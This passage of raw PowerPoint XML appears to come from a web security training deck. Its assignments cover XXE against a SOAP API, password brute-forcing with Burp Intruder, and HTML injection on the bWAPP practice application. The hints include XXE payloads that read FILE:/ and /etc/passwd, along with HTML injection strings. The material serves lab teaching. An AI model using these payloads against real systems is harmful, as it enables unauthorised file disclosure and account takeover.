            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#22b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access SOAP API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Find XXE vulnerability, if content-type=app/json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: Use below payloads:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!DOCTYPE test [&lt;!ENTITY list SYSTEM "FILE:/"&gt;]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!DOCTYPE test [&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SYSTEM "file:/etc/passwd"&gt;]&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224316862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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attempt password attack on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bwap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> login application to find UN &amp; PWD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use intruder-Burp Suite]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34618819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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{80A18725-43D4-418A-88CA-28869B7015B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1714500" y="257111"/>
            <a:ext cx="8553450" cy="5200650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324980382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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#24a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attempt html injection attack [get, post] on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bwap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Confirm if html injection happens in source code and in application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: Use Burp Suite hack bar or manual intercept attack or use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> payloads ; payloads : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;marquee&gt;running text-Hacked&lt;/marquee&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1586276240"/>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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#24b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attempt html injection attack on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bwap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> set security to medium</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: Use Burp Suite intercept attack or use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> payloads ; use URL decoder once ; if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>does’nt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> works, try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> encode twice ; payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;a href=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;/a&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172949164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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
